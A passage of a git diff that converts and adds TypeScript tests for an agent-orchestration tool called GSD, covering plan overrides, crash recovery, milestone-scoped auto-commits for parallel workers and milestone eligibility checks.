-  assertEq(result[1].change, "Use JWT instead of session cookies", "second change text");
-}
+  test('parseOverrides: single active override', () => {
+    const content = `# GSD Overrides\n\nUser-issued overrides that supersede plan document content.\n\n---\n\n## Override: 2026-03-14T10:00:00.000Z\n\n**Change:** Use Postgres instead of SQLite\n**Scope:** active\n**Applied-at:** M001/S02/T03\n\n---\n`;
+    const result = parseOverrides(content);
+    assert.deepStrictEqual(result.length, 1, "parses one override");
+    assert.deepStrictEqual(result[0].timestamp, "2026-03-14T10:00:00.000Z", "correct timestamp");
+    assert.deepStrictEqual(result[0].change, "Use Postgres instead of SQLite", "correct change");
+    assert.deepStrictEqual(result[0].scope, "active", "correct scope");
+    assert.deepStrictEqual(result[0].appliedAt, "M001/S02/T03", "correct appliedAt");
+  });
 
-console.log('\n=== appendOverride: creates new file ===');
-{
-  const tmp = makeTempDir("append-new");
-  await appendOverride(tmp, "Use Postgres", "M001/S01/T01");
-  const content = readFileSync(join(tmp, ".gsd", "OVERRIDES.md"), "utf-8");
-  assertTrue(content.includes("# GSD Overrides"), "has header");
-  assertTrue(content.includes("**Change:** Use Postgres"), "has change");
-  assertTrue(content.includes("**Scope:** active"), "has active scope");
-  assertTrue(content.includes("**Applied-at:** M001/S01/T01"), "has appliedAt");
-}
+  test('parseOverrides: multiple overrides, mixed scopes', () => {
+    const content = `# GSD Overrides\n\n---\n\n## Override: 2026-03-14T10:00:00.000Z\n\n**Change:** Use Postgres instead of SQLite\n**Scope:** resolved\n**Applied-at:** M001/S02/T03\n\n---\n\n## Override: 2026-03-14T11:00:00.000Z\n\n**Change:** Use JWT instead of session cookies\n**Scope:** active\n**Applied-at:** M001/S03/T01\n\n---\n`;
+    const result = parseOverrides(content);
+    assert.deepStrictEqual(result.length, 2, "parses two overrides");
+    assert.deepStrictEqual(result[0].scope, "resolved", "first is resolved");
+    assert.deepStrictEqual(result[1].scope, "active", "second is active");
+    assert.deepStrictEqual(result[1].change, "Use JWT instead of session cookies", "second change text");
+  });
 
-console.log('\n=== appendOverride: appends to existing file ===');
-{
-  const tmp = makeTempDir("append-existing");
-  await appendOverride(tmp, "First override", "M001/S01/T01");
-  await appendOverride(tmp, "Second override", "M001/S02/T02");
-  const content = readFileSync(join(tmp, ".gsd", "OVERRIDES.md"), "utf-8");
-  assertTrue(content.includes("**Change:** First override"), "has first override");
-  assertTrue(content.includes("**Change:** Second override"), "has second override");
-  const parsed = parseOverrides(content);
-  assertEq(parsed.length, 2, "two overrides in file");
-}
+  test('appendOverride: creates new file', async () => {
+    const tmp = makeTempDir("append-new");
+    await appendOverride(tmp, "Use Postgres", "M001/S01/T01");
+    const content = readFileSync(join(tmp, ".gsd", "OVERRIDES.md"), "utf-8");
+    assert.ok(content.includes("# GSD Overrides"), "has header");
+    assert.ok(content.includes("**Change:** Use Postgres"), "has change");
+    assert.ok(content.includes("**Scope:** active"), "has active scope");
+    assert.ok(content.includes("**Applied-at:** M001/S01/T01"), "has appliedAt");
+  });
 
-console.log('\n=== loadActiveOverrides: no file ===');
-{
-  const tmp = makeTempDir("load-no-file");
-  const result = await loadActiveOverrides(tmp);
-  assertEq(result.length, 0, "returns empty when no file");
-}
+  test('appendOverride: appends to existing file', async () => {
+    const tmp = makeTempDir("append-existing");
+    await appendOverride(tmp, "First override", "M001/S01/T01");
+    await appendOverride(tmp, "Second override", "M001/S02/T02");
+    const content = readFileSync(join(tmp, ".gsd", "OVERRIDES.md"), "utf-8");
+    assert.ok(content.includes("**Change:** First override"), "has first override");
+    assert.ok(content.includes("**Change:** Second override"), "has second override");
+    const parsed = parseOverrides(content);
+    assert.deepStrictEqual(parsed.length, 2, "two overrides in file");
+  });
 
-console.log('\n=== loadActiveOverrides: filters to active only ===');
-{
-  const tmp = makeTempDir("load-filter");
-  const content = `# GSD Overrides\n\n---\n\n## Override: 2026-03-14T10:00:00.000Z\n\n**Change:** Resolved change\n**Scope:** resolved\n**Applied-at:** M001/S01/T01\n\n---\n\n## Override: 2026-03-14T11:00:00.000Z\n\n**Change:** Active change\n**Scope:** active\n**Applied-at:** M001/S02/T01\n\n---\n`;
-  writeFileSync(join(tmp, ".gsd", "OVERRIDES.md"), content, "utf-8");
-  const result = await loadActiveOverrides(tmp);
-  assertEq(result.length, 1, "only one active override");
-  assertEq(result[0].change, "Active change", "correct active change");
-}
+  test('loadActiveOverrides: no file', async () => {
+    const tmp = makeTempDir("load-no-file");
+    const result = await loadActiveOverrides(tmp);
+    assert.deepStrictEqual(result.length, 0, "returns empty when no file");
+  });
 
-console.log('\n=== formatOverridesSection: empty array ===');
-{ const result = formatOverridesSection([]); assertEq(result, "", "empty overrides returns empty string"); }
+  test('loadActiveOverrides: filters to active only', async () => {
+    const tmp = makeTempDir("load-filter");
+    const content = `# GSD Overrides\n\n---\n\n## Override: 2026-03-14T10:00:00.000Z\n\n**Change:** Resolved change\n**Scope:** resolved\n**Applied-at:** M001/S01/T01\n\n---\n\n## Override: 2026-03-14T11:00:00.000Z\n\n**Change:** Active change\n**Scope:** active\n**Applied-at:** M001/S02/T01\n\n---\n`;
+    writeFileSync(join(tmp, ".gsd", "OVERRIDES.md"), content, "utf-8");
+    const result = await loadActiveOverrides(tmp);
+    assert.deepStrictEqual(result.length, 1, "only one active override");
+    assert.deepStrictEqual(result[0].change, "Active change", "correct active change");
+  });
 
-console.log('\n=== formatOverridesSection: formats section ===');
-{
-  const overrides: Override[] = [
-    { timestamp: "2026-03-14T10:00:00.000Z", change: "Use Postgres", scope: "active", appliedAt: "M001/S01/T01" },
-  ];
-  const result = formatOverridesSection(overrides);
-  assertTrue(result.includes("## Active Overrides (supersede plan content)"), "has header");
-  assertTrue(result.includes("**Use Postgres**"), "has change text");
-  assertTrue(result.includes("supersede any conflicting content"), "has instruction");
-}
+  test('formatOverridesSection: empty array', () => {
+    const result = formatOverridesSection([]); assert.deepStrictEqual(result, "", "empty overrides returns empty string");
+  });
 
-console.log('\n=== resolveAllOverrides: marks all as resolved ===');
-{
-  const tmp = makeTempDir("resolve-all");
-  await appendOverride(tmp, "First", "M001/S01/T01");
-  await appendOverride(tmp, "Second", "M001/S02/T01");
-  let active = await loadActiveOverrides(tmp);
-  assertEq(active.length, 2, "two active before resolve");
-  await resolveAllOverrides(tmp);
-  active = await loadActiveOverrides(tmp);
-  assertEq(active.length, 0, "no active after resolve");
-  const content = readFileSync(join(tmp, ".gsd", "OVERRIDES.md"), "utf-8");
-  const allOverrides = parseOverrides(content);
-  assertEq(allOverrides.length, 2, "still two overrides total");
-  assertTrue(allOverrides.every(o => o.scope === "resolved"), "all resolved");
-}
+  test('formatOverridesSection: formats section', () => {
+    const overrides: Override[] = [
+      { timestamp: "2026-03-14T10:00:00.000Z", change: "Use Postgres", scope: "active", appliedAt: "M001/S01/T01" },
+    ];
+    const result = formatOverridesSection(overrides);
+    assert.ok(result.includes("## Active Overrides (supersede plan content)"), "has header");
+    assert.ok(result.includes("**Use Postgres**"), "has change text");
+    assert.ok(result.includes("supersede any conflicting content"), "has instruction");
+  });
 
-console.log('\n=== resolveAllOverrides: no file — no error ===');
-{
-  const tmp = makeTempDir("resolve-no-file");
-  await resolveAllOverrides(tmp);
-  assertTrue(true, "resolveAllOverrides with no file does not throw");
-}
+  test('resolveAllOverrides: marks all as resolved', async () => {
+    const tmp = makeTempDir("resolve-all");
+    await appendOverride(tmp, "First", "M001/S01/T01");
+    await appendOverride(tmp, "Second", "M001/S02/T01");
+    let active = await loadActiveOverrides(tmp);
+    assert.deepStrictEqual(active.length, 2, "two active before resolve");
+    await resolveAllOverrides(tmp);
+    active = await loadActiveOverrides(tmp);
+    assert.deepStrictEqual(active.length, 0, "no active after resolve");
+    const content = readFileSync(join(tmp, ".gsd", "OVERRIDES.md"), "utf-8");
+    const allOverrides = parseOverrides(content);
+    assert.deepStrictEqual(allOverrides.length, 2, "still two overrides total");
+    assert.ok(allOverrides.every(o => o.scope === "resolved"), "all resolved");
+  });
 
-cleanup();
-report();
+  test('resolveAllOverrides: no file — no error', async () => {
+    const tmp = makeTempDir("resolve-no-file");
+    await resolveAllOverrides(tmp);
+    assert.ok(true, "resolveAllOverrides with no file does not throw");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-budget-atomicity.test.ts b/src/resources/extensions/gsd/tests/parallel-budget-atomicity.test.ts
index 461beb245..cf2bd048e 100644
--- a/src/resources/extensions/gsd/tests/parallel-budget-atomicity.test.ts
+++ b/src/resources/extensions/gsd/tests/parallel-budget-atomicity.test.ts
@@ -322,7 +322,6 @@ test("budget — refreshWorkerStatuses updates worker state from disk", async ()
     const workers = getWorkerStatuses();
     assert.equal(workers.length, 1);
     assert.equal(workers[0]!.state, "paused", "worker state should be updated from disk");
-    assert.equal(workers[0]!.completedUnits, 5, "completedUnits should be updated from disk");
     assert.equal(workers[0]!.cost, 2.5, "cost should be updated from disk");
   } finally {
     resetOrchestrator();
diff --git a/src/resources/extensions/gsd/tests/parallel-commit-scope.test.ts b/src/resources/extensions/gsd/tests/parallel-commit-scope.test.ts
new file mode 100644
index 000000000..f7de95667
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/parallel-commit-scope.test.ts
@@ -0,0 +1,159 @@
+/**
+ * parallel-commit-scope.test.ts — Regression test for #1991.
+ *
+ * Parallel workers must only commit files belonging to their locked milestone.
+ * When GSD_MILESTONE_LOCK is set, smartStage() must exclude .gsd/milestones/<M>/
+ * directories for milestones other than the locked one.
+ *
+ * Without the fix, a worker for M033 can stage and commit fabricated artifacts
+ * under .gsd/milestones/M032/, causing cross-milestone pollution.
+ */
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  rmSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execFileSync } from "node:child_process";
+
+import {
+  GitServiceImpl,
+} from "../git-service.ts";
+
+function run(command: string, cwd: string): string {
+  const [cmd, ...args] = command.split(" ");
+  return execFileSync(cmd, args, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function gitRun(args: string[], cwd: string): string {
+  return execFileSync("git", args, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function createFile(base: string, relPath: string, content: string): void {
+  const full = join(base, relPath);
+  mkdirSync(join(full, ".."), { recursive: true });
+  writeFileSync(full, content, "utf-8");
+}
+
+function initTempRepo(): string {
+  const dir = mkdtempSync(join(tmpdir(), "gsd-parallel-scope-"));
+  gitRun(["init", "-b", "main"], dir);
+  gitRun(["config", "user.name", "Test"], dir);
+  gitRun(["config", "user.email", "test@test.com"], dir);
+  createFile(dir, ".gitkeep", "");
+  gitRun(["add", "-A"], dir);
+  gitRun(["commit", "-m", "init"], dir);
+  return dir;
+}
+
+describe("parallel commit scope (#1991)", () => {
+  const savedEnv: Record<string, string | undefined> = {};
+
+  beforeEach(() => {
+    savedEnv.GSD_MILESTONE_LOCK = process.env.GSD_MILESTONE_LOCK;
+    savedEnv.GSD_PARALLEL_WORKER = process.env.GSD_PARALLEL_WORKER;
+  });
+
+  afterEach(() => {
+    for (const key of ["GSD_MILESTONE_LOCK", "GSD_PARALLEL_WORKER"] as const) {
+      if (savedEnv[key] === undefined) {
+        delete process.env[key];
+      } else {
+        process.env[key] = savedEnv[key];
+      }
+    }
+  });
+
+  test("autoCommit excludes other milestone directories when GSD_MILESTONE_LOCK is set", () => {
+    const repo = initTempRepo();
+
+    // Set up parallel worker environment for M033
+    process.env.GSD_MILESTONE_LOCK = "M033";
+    process.env.GSD_PARALLEL_WORKER = "1";
+
+    // Create dirty files in BOTH milestones (simulates cross-milestone pollution)
+    createFile(repo, ".gsd/milestones/M032/M032-SUMMARY.md", "# M032 Summary\nFabricated by M033 worker");
+    createFile(repo, ".gsd/milestones/M032/M032-VALIDATION.md", "# M032 Validation\nFabricated");
+    createFile(repo, ".gsd/milestones/M032/slices/S01/S01-SUMMARY.md", "Fabricated S01 summary");
+    createFile(repo, ".gsd/milestones/M033/slices/S01/tasks/T01-SUMMARY.md", "Legit T01 summary");
+    createFile(repo, "src/feature.ts", "export const x = 1;");
+
+    const svc = new GitServiceImpl(repo);
+    const msg = svc.autoCommit("complete-milestone", "M033/complete");
+    assert.ok(msg !== null, "autoCommit should produce a commit");
+
+    const committed = gitRun(["show", "--name-only", "HEAD"], repo);
+
+    // Source files and own milestone files SHOULD be committed
+    assert.ok(committed.includes("src/feature.ts"), "source files are committed");
+    assert.ok(committed.includes(".gsd/milestones/M033/"), "own milestone files are committed");
+
+    // Other milestone files MUST NOT be committed
+    assert.ok(!committed.includes(".gsd/milestones/M032/"),
+      "M032 files must NOT be committed by M033 worker — cross-milestone pollution (#1991)");
+
+    // Verify M032 files are still dirty (unstaged) in the working tree
+    const status = gitRun(["status", "--porcelain"], repo);
+    assert.ok(status.includes("M032"), "M032 files remain as untracked/dirty in working tree");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
+
+  test("autoCommit stages all milestones when GSD_MILESTONE_LOCK is NOT set (solo mode)", () => {
+    const repo = initTempRepo();
+
+    // No milestone lock — solo worker mode
+    delete process.env.GSD_MILESTONE_LOCK;
+    delete process.env.GSD_PARALLEL_WORKER;
+
+    createFile(repo, ".gsd/milestones/M032/M032-SUMMARY.md", "# M032 Summary");
+    createFile(repo, ".gsd/milestones/M033/slices/S01/tasks/T01-SUMMARY.md", "T01 summary");
+    createFile(repo, "src/feature.ts", "export const x = 1;");
+
+    const svc = new GitServiceImpl(repo);
+    const msg = svc.autoCommit("complete-milestone", "M032/complete");
+    assert.ok(msg !== null, "autoCommit should produce a commit");
+
+    const committed = gitRun(["show", "--name-only", "HEAD"], repo);
+
+    // In solo mode, ALL milestone files should be committed
+    assert.ok(committed.includes(".gsd/milestones/M032/"), "M032 files committed in solo mode");
+    assert.ok(committed.includes(".gsd/milestones/M033/"), "M033 files committed in solo mode");
+    assert.ok(committed.includes("src/feature.ts"), "source files committed in solo mode");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
+
+  test("autoCommit scopes to locked milestone even with multiple foreign milestones", () => {
+    const repo = initTempRepo();
+
+    process.env.GSD_MILESTONE_LOCK = "M035";
+    process.env.GSD_PARALLEL_WORKER = "1";
+
+    // Create files across many milestones
+    createFile(repo, ".gsd/milestones/M032/M032-SUMMARY.md", "foreign");
+    createFile(repo, ".gsd/milestones/M033/M033-SUMMARY.md", "foreign");
+    createFile(repo, ".gsd/milestones/M034/M034-SUMMARY.md", "foreign");
+    createFile(repo, ".gsd/milestones/M035/slices/S01/tasks/T01-SUMMARY.md", "own work");
+    createFile(repo, "src/app.ts", "export const app = {};");
+
+    const svc = new GitServiceImpl(repo);
+    const msg = svc.autoCommit("execute-task", "M035/S01/T01");
+    assert.ok(msg !== null, "autoCommit should produce a commit");
+
+    const committed = gitRun(["show", "--name-only", "HEAD"], repo);
+
+    assert.ok(committed.includes(".gsd/milestones/M035/"), "own milestone committed");
+    assert.ok(committed.includes("src/app.ts"), "source files committed");
+    assert.ok(!committed.includes(".gsd/milestones/M032/"), "M032 excluded");
+    assert.ok(!committed.includes(".gsd/milestones/M033/"), "M033 excluded");
+    assert.ok(!committed.includes(".gsd/milestones/M034/"), "M034 excluded");
+
+    rmSync(repo, { recursive: true, force: true });
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-crash-recovery.test.ts b/src/resources/extensions/gsd/tests/parallel-crash-recovery.test.ts
index 9e38c7262..b4a1bed08 100644
--- a/src/resources/extensions/gsd/tests/parallel-crash-recovery.test.ts
+++ b/src/resources/extensions/gsd/tests/parallel-crash-recovery.test.ts
@@ -5,6 +5,8 @@
  * restored after a coordinator crash, with PID liveness filtering.
  */
 
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import {
   mkdtempSync,
   mkdirSync,
@@ -24,10 +26,6 @@ import {
   type PersistedState,
 } from "../parallel-orchestrator.ts";
 import { writeSessionStatus, readAllSessionStatuses, removeSessionStatus } from "../session-status-io.ts";
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
-
 // ─── Helpers ──────────────────────────────────────────────────────────────────
 
 function makeTempDir(): string {
@@ -57,8 +55,9 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
 
 // ─── Tests ────────────────────────────────────────────────────────────────────
 
-// Test 1: persistState writes valid JSON
-{
+
+describe('parallel-crash-recovery', () => {
+test('Test 1: persistState writes valid JSON', () => {
   const basePath = makeTempDir();
   try {
     // We can't call persistState directly without internal state set up,
@@ -72,7 +71,6 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
           worktreePath: "/tmp/wt-M001",
           startedAt: Date.now(),
           state: "running",
-          completedUnits: 3,
           cost: 0.15,
         },
       ],
@@ -82,29 +80,27 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
 
     const raw = readFileSync(stateFilePath(basePath), "utf-8");
     const parsed = JSON.parse(raw) as PersistedState;
-    assertEq(parsed.active, true, "persistState: active field preserved");
-    assertEq(parsed.workers.length, 1, "persistState: worker count preserved");
-    assertEq(parsed.workers[0].milestoneId, "M001", "persistState: milestoneId preserved");
-    assertEq(parsed.workers[0].cost, 0.15, "persistState: cost preserved");
-    assertEq(parsed.totalCost, 0.15, "persistState: totalCost preserved");
+    assert.deepStrictEqual(parsed.active, true, "persistState: active field preserved");
+    assert.deepStrictEqual(parsed.workers.length, 1, "persistState: worker count preserved");
+    assert.deepStrictEqual(parsed.workers[0].milestoneId, "M001", "persistState: milestoneId preserved");
+    assert.deepStrictEqual(parsed.workers[0].cost, 0.15, "persistState: cost preserved");
+    assert.deepStrictEqual(parsed.totalCost, 0.15, "persistState: totalCost preserved");
   } finally {
     rmSync(basePath, { recursive: true, force: true });
   }
-}
+});
 
-// Test 2: restoreState returns null for missing file
-{
+test('Test 2: restoreState returns null for missing file', () => {
   const basePath = makeTempDir();
   try {
     const result = restoreState(basePath);
-    assertEq(result, null, "restoreState: returns null when no state file");
+    assert.deepStrictEqual(result, null, "restoreState: returns null when no state file");
   } finally {
     rmSync(basePath, { recursive: true, force: true });
   }
-}
+});
 
-// Test 3: restoreState filters dead PIDs
-{
+test('Test 3: restoreState filters dead PIDs', () => {
   const basePath = makeTempDir();
   try {
     // PID 99999999 is almost certainly not alive
@@ -117,7 +113,6 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
           worktreePath: "/tmp/wt-M001",
           startedAt: Date.now(),
           state: "running",
-          completedUnits: 0,
           cost: 0,
         },
         {
@@ -127,7 +122,6 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
           worktreePath: "/tmp/wt-M002",
           startedAt: Date.now(),
           state: "running",
-          completedUnits: 0,
           cost: 0,
         },
       ],
@@ -136,15 +130,14 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
 
     const result = restoreState(basePath);
     // Both PIDs are dead, so result should be null and file should be cleaned up
-    assertEq(result, null, "restoreState: returns null when all PIDs dead");
-    assertTrue(!existsSync(stateFilePath(basePath)), "restoreState: cleans up state file when all dead");
+    assert.deepStrictEqual(result, null, "restoreState: returns null when all PIDs dead");
+    assert.ok(!existsSync(stateFilePath(basePath)), "restoreState: cleans up state file when all dead");
   } finally {
     rmSync(basePath, { recursive: true, force: true });
   }
-}
+});
 
-// Test 4: restoreState keeps alive PIDs
-{
+test('Test 4: restoreState keeps alive PIDs', () => {
   const basePath = makeTempDir();
   try {
     // Use current process PID (definitely alive)
@@ -157,7 +150,6 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
           worktreePath: "/tmp/wt-M001",
           startedAt: Date.now(),
           state: "running",
-          completedUnits: 5,
           cost: 0.25,
         },
         {
@@ -167,7 +159,6 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
           worktreePath: "/tmp/wt-M002",
           startedAt: Date.now(),
           state: "running",
-          completedUnits: 0,
           cost: 0,
         },
       ],
@@ -176,18 +167,16 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
     writeStateFile(basePath, state);
 
     const result = restoreState(basePath);
-    assertTrue(result !== null, "restoreState: returns state when alive PID exists");
-    assertEq(result!.workers.length, 1, "restoreState: filters out dead PID");
-    assertEq(result!.workers[0].milestoneId, "M001", "restoreState: keeps alive worker");
-    assertEq(result!.workers[0].pid, process.pid, "restoreState: preserves PID");
-    assertEq(result!.workers[0].completedUnits, 5, "restoreState: preserves progress");
+    assert.ok(result !== null, "restoreState: returns state when alive PID exists");
+    assert.deepStrictEqual(result!.workers.length, 1, "restoreState: filters out dead PID");
+    assert.deepStrictEqual(result!.workers[0].milestoneId, "M001", "restoreState: keeps alive worker");
+    assert.deepStrictEqual(result!.workers[0].pid, process.pid, "restoreState: preserves PID");
   } finally {
     rmSync(basePath, { recursive: true, force: true });
   }
-}
+});
 
-// Test 5: restoreState skips stopped/error workers even with alive PIDs
-{
+test('Test 5: restoreState skips stopped/error workers even with alive PIDs', () => {
   const basePath = makeTempDir();
   try {
     const state = makePersistedState({
@@ -199,7 +188,6 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
           worktreePath: "/tmp/wt-M001",
           startedAt: Date.now(),
           state: "stopped",
-          completedUnits: 10,
           cost: 0.50,
         },
       ],
@@ -207,14 +195,13 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
     writeStateFile(basePath, state);
 
     const result = restoreState(basePath);
-    assertEq(result, null, "restoreState: skips stopped workers");
+    assert.deepStrictEqual(result, null, "restoreState: skips stopped workers");
   } finally {
     rmSync(basePath, { recursive: true, force: true });
   }
-}
+});
 
-// Test 6: orphan detection finds stale sessions
-{
+test('Test 6: orphan detection finds stale sessions', () => {
   const basePath = makeTempDir();
   try {
     // Write a session status with a dead PID
@@ -246,7 +233,7 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
 
     // Read all sessions — both should exist initially
     const before = readAllSessionStatuses(basePath);
-    assertEq(before.length, 2, "orphan: both sessions exist before detection");
+    assert.deepStrictEqual(before.length, 2, "orphan: both sessions exist before detection");
 
     // Now simulate orphan detection logic (same as prepareParallelStart)
     const sessions = readAllSessionStatuses(basePath);
@@ -265,34 +252,33 @@ function makePersistedState(overrides: Partial<PersistedState> = {}): PersistedS
       }
     }
 
-    assertTrue(orphans.length === 2, "orphan: detected both sessions");
+    assert.ok(orphans.length === 2, "orphan: detected both sessions");
     const deadOrphan = orphans.find(o => o.milestoneId === "M001");
-    assertTrue(deadOrphan !== undefined && !deadOrphan.alive, "orphan: M001 detected as dead");
+    assert.ok(deadOrphan !== undefined && !deadOrphan.alive, "orphan: M001 detected as dead");
     const aliveOrphan = orphans.find(o => o.milestoneId === "M002");
-    assertTrue(aliveOrphan !== undefined && aliveOrphan.alive, "orphan: M002 detected as alive");
+    assert.ok(aliveOrphan !== undefined && aliveOrphan.alive, "orphan: M002 detected as alive");
 
     // Dead session should be cleaned up
     const after = readAllSessionStatuses(basePath);
-    assertEq(after.length, 1, "orphan: dead session cleaned up");
-    assertEq(after[0].milestoneId, "M002", "orphan: alive session remains");
+    assert.deepStrictEqual(after.length, 1, "orphan: dead session cleaned up");
+    assert.deepStrictEqual(after[0].milestoneId, "M002", "orphan: alive session remains");
   } finally {
     rmSync(basePath, { recursive: true, force: true });
   }
-}
+});
 
-// Test 7: restoreState handles corrupt JSON gracefully
-{
+test('Test 7: restoreState handles corrupt JSON gracefully', () => {
   const basePath = makeTempDir();
   try {
     writeFileSync(stateFilePath(basePath), "{ not valid json !!!", "utf-8");
     const result = restoreState(basePath);
-    assertEq(result, null, "restoreState: returns null for corrupt JSON");
+    assert.deepStrictEqual(result, null, "restoreState: returns null for corrupt JSON");
   } finally {
     rmSync(basePath, { recursive: true, force: true });
   }
-}
+});
 
 // Clean up module state
 resetOrchestrator();
 
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-eligibility-ghost.test.ts b/src/resources/extensions/gsd/tests/parallel-eligibility-ghost.test.ts
new file mode 100644
index 000000000..ae8b87791
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/parallel-eligibility-ghost.test.ts
@@ -0,0 +1,150 @@
+/**
+ * Tests for parallel eligibility edge cases:
+ * - Ghost milestones (no registry entry) must NOT appear eligible (#2501 Bug 2)
+ * - Milestones with failed worktree merge (SUMMARY only in worktree, DB still
+ *   "active") must NOT appear eligible (#2501 Bug 1 context)
+ */
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { analyzeParallelEligibility } from "../parallel-eligibility.ts";
+import { invalidateStateCache } from "../state.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  updateMilestoneStatus,
+} from "../gsd-db.ts";
+
+// ─── Fixture Helpers ───────────────────────────────────────────────────────
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-parallel-elig-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function writeMilestoneFile(
+  base: string,
+  milestoneId: string,
+  filename: string,
+  content: string,
+): void {
+  const filePath = join(base, ".gsd", "milestones", milestoneId, filename);
+  mkdirSync(join(filePath, ".."), { recursive: true });
+  writeFileSync(filePath, content);
+}
+
+function makeMilestoneDir(base: string, milestoneId: string): void {
+  mkdirSync(join(base, ".gsd", "milestones", milestoneId), { recursive: true });
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+// ─── Tests ─────────────────────────────────────────────────────────────────
+
+describe("parallel-eligibility: ghost milestone ineligibility (#2501)", () => {
+  let base: string;
+
+  beforeEach(() => {
+    base = createFixtureBase();
+    openDatabase(":memory:");
+  });
+
+  afterEach(() => {
+    closeDatabase();
+    cleanup(base);
+    invalidateStateCache();
+  });
+
+  test("ghost milestone (directory only, no planning files) is ineligible", async () => {
+    // Set up a real milestone M001 with proper planning data in DB
+    writeMilestoneFile(base, "M001", "M001-CONTEXT.md", "# M001: Real Milestone\n\nA real milestone.");
+    writeMilestoneFile(base, "M001", "M001-ROADMAP.md", "# M001: Real Milestone\n\n## Slices\n\n- [ ] **S01: First Slice** `risk:low` `depends:[]`\n  > Do something.\n");
+    writeMilestoneFile(base, "M001", "slices/S01/S01-PLAN.md", "# S01: First Slice\n\n**Goal:** Do it.\n**Demo:** Done.\n\n## Tasks\n\n- [ ] **T01: Task One** `est:10m`\n  Do the thing.\n");
+    insertMilestone({ id: "M001", title: "M001: Real Milestone", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First Slice", status: "active", risk: "low", depends: [] });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "Task One", status: "pending" });
+
+    // Create ghost milestone M017 — directory with only slices/, no CONTEXT/ROADMAP/SUMMARY
+    makeMilestoneDir(base, "M017");
+    mkdirSync(join(base, ".gsd", "milestones", "M017", "slices"), { recursive: true });
+
+    invalidateStateCache();
+    const result = await analyzeParallelEligibility(base);
+
+    // M017 should NOT be in the eligible list
+    const ghostEligible = result.eligible.find(e => e.milestoneId === "M017");
+    assert.equal(
+      ghostEligible,
+      undefined,
+      "Ghost milestone M017 must NOT appear in eligible list — it has no planning data",
+    );
+
+    // M017 should be in the ineligible list with an appropriate reason
+    const ghostIneligible = result.ineligible.find(e => e.milestoneId === "M017");
+    assert.ok(
+      ghostIneligible,
+      "Ghost milestone M017 must appear in ineligible list",
+    );
+    assert.equal(ghostIneligible!.eligible, false);
+    assert.match(
+      ghostIneligible!.reason,
+      /no planning data|unknown|no registry/i,
+      "Reason should indicate the milestone has no planning data or is unknown",
+    );
+  });
+
+  test("milestone with DB status active and no SUMMARY on disk is not eligible when it has no slices", async () => {
+    // Simulate a milestone whose complete-milestone ran in a worktree, wrote
+    // SUMMARY there, but the squash-merge back to main failed.  The DB row
+    // was never updated (pre-fix scenario) and the SUMMARY file didn't reach
+    // the main project directory.
+    //
+    // In the current codebase, complete-milestone.ts already writes the DB
+    // status (Bug 1 was fixed). This test guards the fallback: even when the
+    // DB says "active" and the SUMMARY is missing from the main project dir,
+    // the milestone must NOT slip through as eligible.
+
+    // M012 — directory exists, CONTEXT exists (so it's not a ghost), but no
+    // SUMMARY on disk and DB says "active".  No slices in DB either (they
+    // lived only in the worktree DB copy).
+    writeMilestoneFile(base, "M012", "M012-CONTEXT.md", "# M012: Worktree Milestone\n\nThis ran in a worktree.");
+    insertMilestone({ id: "M012", title: "M012: Worktree Milestone", status: "active" });
+
+    // M001 — a normal pending milestone with proper planning
+    writeMilestoneFile(base, "M001", "M001-CONTEXT.md", "# M001: Normal Milestone\n\nNormal milestone.");
+    writeMilestoneFile(base, "M001", "M001-ROADMAP.md", "# M001: Normal Milestone\n\n## Slices\n\n- [ ] **S01: Slice** `risk:low` `depends:[]`\n  > Do it.\n");
+    writeMilestoneFile(base, "M001", "slices/S01/S01-PLAN.md", "# S01: Slice\n\n**Goal:** Do.\n**Demo:** Done.\n\n## Tasks\n\n- [ ] **T01: Task** `est:10m`\n  Do.\n");
+    insertMilestone({ id: "M001", title: "M001: Normal Milestone", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Slice", status: "active", risk: "low", depends: [] });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "Task", status: "pending" });
+
+    invalidateStateCache();
+    const result = await analyzeParallelEligibility(base);
+
+    // M001 should be eligible (it has proper planning and active status)
